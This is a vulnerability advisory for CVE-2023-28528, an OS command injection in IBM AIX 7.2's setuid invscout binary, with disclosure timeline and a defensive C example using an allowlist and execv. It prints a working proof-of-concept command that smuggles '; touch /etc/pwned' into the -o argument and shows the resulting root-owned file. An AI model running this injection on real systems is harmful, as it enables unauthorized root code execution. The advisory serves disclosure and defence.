CVE-2023-28528
An OS command injection vulnerability exists in the invscout setUID binary functionality of IBM Corporation AIX 7.2. A specially-crafted command line argument can lead to the execution of a privileged operation. An attacker can trigger this vulnerability to achieve arbitrary code execution.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
IBM Corporation AIX 7.2
AIX - http://us.ibm.com
5.5 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)
AIX is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms.
The invscout setUID binary has an undocumented parameter that can be used to request the installation of an arbitrary RPM. Furthermore, the mechanism by which the RPM is installed requires the supplied value to be concatenated into a string that is then passed into system().
The most trivial method of exploitation to gain command execution takes the following form:
$ invscout -RPM ../../../../../$HOME/info-6.7-1.aix5.1.ppc.rpm -o "-i ../../../../../$HOME/info-6.7-1.aix5.1.ppc.rpm; touch /etc/pwned; echo "
package info-6.7-1.ppc is already installed
/var/adm/invscout/microcode/../../../../..//home/tmb/info-6.7-1.aix5.1.ppc.rpm
$ ls -la /etc/pwned
-rw-rw-rw- 1 root staff 0 Dec 18 12:59 /etc/pwned
Note: The umask is set to 0 prior to exploitation commencing.
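The root cause above is twofold: a path argument that is not confined to the staging directory, and an option string spliced into a shell command for system(). The following is an added example of the defensive pattern (it is not IBM's invscout code): the file name is restricted to the staging directory, the rpm option must match an allowlist, and rpm is started with execv() from an argv array so that shell metacharacters are never interpreted. RPM_BIN, RPM_BASE and the function names are assumptions; the base directory is taken from the output shown in the advisory.

```c
/* Added example (not IBM's invscout code): a setuid helper that installs an
 * RPM named on the command line without handing attacker text to a shell.
 * RPM_BASE and RPM_BIN are assumptions; the base path is from the advisory. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define RPM_BASE "/var/adm/invscout/microcode/" /* assumed staging directory */
#define RPM_BIN  "/usr/bin/rpm"                 /* assumed rpm location */
/* Accept a bare file name only: no '/', no "..", conservative character set,
 * so the argument cannot name a file outside RPM_BASE. Returns 1 if safe. */
int rpm_name_is_safe(const char *name) {
    if (name == NULL || *name == '\0' || strstr(name, "..") != NULL) return 0;
    for (const char *p = name; *p; p++)
        if (!isalnum((unsigned char)*p) && strchr("._-", *p) == NULL) return 0;
    return 1;
}

/* Build argv for execv(): every value is its own argument, never a shell
 * string, so ';' or '|' in opt reach rpm literally instead of being parsed.
 * opt must also match a fixed allowlist. Returns argc, or -1 on rejection. */
int build_rpm_argv(const char *name, const char *opt,
                   char *path, size_t pathlen, char *argv[4]) {
    static const char *allowed[] = { "-i", "-U", NULL };
    int ok = 0;
    for (const char **o = allowed; *o; o++) if (strcmp(*o, opt) == 0) ok = 1;
    if (!ok || !rpm_name_is_safe(name)) return -1;
    if (snprintf(path, pathlen, "%s%s", RPM_BASE, name) >= (int)pathlen) return -1;
    argv[0] = RPM_BIN; argv[1] = (char *)opt; argv[2] = path; argv[3] = NULL;
    return 3;
}

/* Run rpm on a validated request via fork/execv. Returns rpm's exit status,
 * or -1 if the request was rejected or the child could not be started. */
int install_rpm(const char *name, const char *opt) {
    char path[512]; char *argv[4]; int status;
    if (build_rpm_argv(name, opt, path, sizeof path, argv) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execv(RPM_BIN, argv); _exit(127); }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Self-check helper: builds into static storage so the result can be inspected. */
static char g_path[512]; static char *g_argv[4];
int check_request(const char *name, const char *opt) {
    return build_rpm_argv(name, opt, g_path, sizeof g_path, g_argv);
}
```

With this shape the traversal path and the "-i ...; touch ...; echo " option string from the transcript above are both rejected before any process is started, and even an accepted option is delivered to rpm as a single argv entry rather than parsed by a shell.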
2023-01-09 - Initial Vendor Contact
2023-01-16 - Vendor Disclosure
2023-04-12 - Vendor Patch Release
2023-04-24 - Public Release
Discovered by Tim Brown of Cisco Security Advisory EMEAR.